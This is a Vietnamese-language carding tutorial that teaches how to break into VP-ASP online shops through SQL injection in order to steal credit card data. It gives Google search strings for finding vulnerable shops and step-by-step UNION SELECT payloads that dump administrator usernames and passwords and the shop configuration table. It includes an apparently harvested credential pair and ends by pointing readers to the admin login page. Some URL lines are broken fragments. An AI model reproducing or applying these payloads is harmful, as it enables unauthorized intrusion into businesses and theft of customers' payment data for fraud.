Hacking Credit Card Version 2.0 --- Written by Hieupc
shopdisplayproducts.asp?
cat='
Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây
là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả
lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card.
Nào giờ chúng ta bắt ðầu bắt ðầu nhé.
Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như:
OLE DB, JET Database, ASP…
Býớc 1:
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.
Từ khoá nên dùng:
allinurl:”shopdisplayproducts.asp?id=
hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2……
Search shop theo Domain .com, .net , .biz…..:
allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat=...
Ai biết chấm gì nữa thì thay vào :)
Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn.
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.
Býớc 2:
Ví dụ: lấy ví dụ là 1 site thế có dạng thế này :
/>Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:
/>Xem nó có bị lỗi không nào, hic nó không bị lỗi, chỉ thấy thế này:
Home Improvement
Page 1 of 2
Không sao, chúng ta hãy bình tĩnh nhé, thay “ id “ bằng “ cat “ thử xem:
/>-->>> />Uh, nó lỗi ruì kìa:
5'
Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.
catdescription like '5'%' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 467
Okie, tiếp tục nhé, bạn sẽ thêm ðoạn code sau ðây vào:
'%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password
/>Khi thêm xong thì sẽ nhý thế này:
/>201=1--sp_password
và ðýợc thế? này :
5' union select 1 from tbluser"having 1=1--sp_password
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 467
Chú ý nhé các bạn, cái dấu phẩy ( ` ) rất quan trọng, không có là không được.
Và cứ thế ta cứ tiếp tục thêm số nhé:
/>201=1--sp_password
/>%201=1--sp_password
/>20tbluser"having%201=1--sp_password
Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số.
Ở ðây là tới số 47 :
/>fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
3
click to see more 4
22
18
Please review these other products:
Nào giờ chúng ta bắt đầu lấy user and pass:
·
fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn
·
fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn
Sau khi thêm xong ta sẽ được nhý thế này:
/>fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
Và có được username và password :
User: stephenrossi
pass: gnilsur
Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được.
/>2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,
40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
Ta sẽ có user và pass được gộp chung 1 số:
stephenrossi/gnilsur
Bước 3:
Tìm link admin, thử đánh cái này vào được không nào: hic không được rồi.
Thử cái này nữa thử xem, may ra nó chạy đến link admin thì sao: , cũng
không được.
Cái này hieupc đã download cái source của VPASP về xem cấu trúc nó thế nào, và đã tìm ra cậu lệnh thế này, chẳng
qua là thay table thôi.
Ta biết table
configuration
là nơi chứa những thông quan trọng của shop như là link admin, afftemplateaffiliate,
afftemplateMerchant…..
Vậy cậu lệnh sẽ thế này:
'%20union%20%20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,
42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Thay vào ta sẽ được:
/>201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,
42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Ta cũng thấy cái bảng:
3
click to see more 4
22
18
Please review these other products:
Lần này thì ta sẽ kiếm link admin, thường thì link admin nằm trong
fieldvalue
, vì thế ta sẽ đặt fieldvalue vào số 3,
hay 4, hay 22 tuỳ các bạn.
'%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Sau khi thêm xong ta sẽ được thế này:
/>fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh,
nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.
Page 1 of 10
Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong
fieldvalue
,
các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin
shopaddmoretocart.asp
/>This site is reserved for Shop Administrators only.
Administrator's Login
UserName :
Password :
Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết.
THE END
Image Field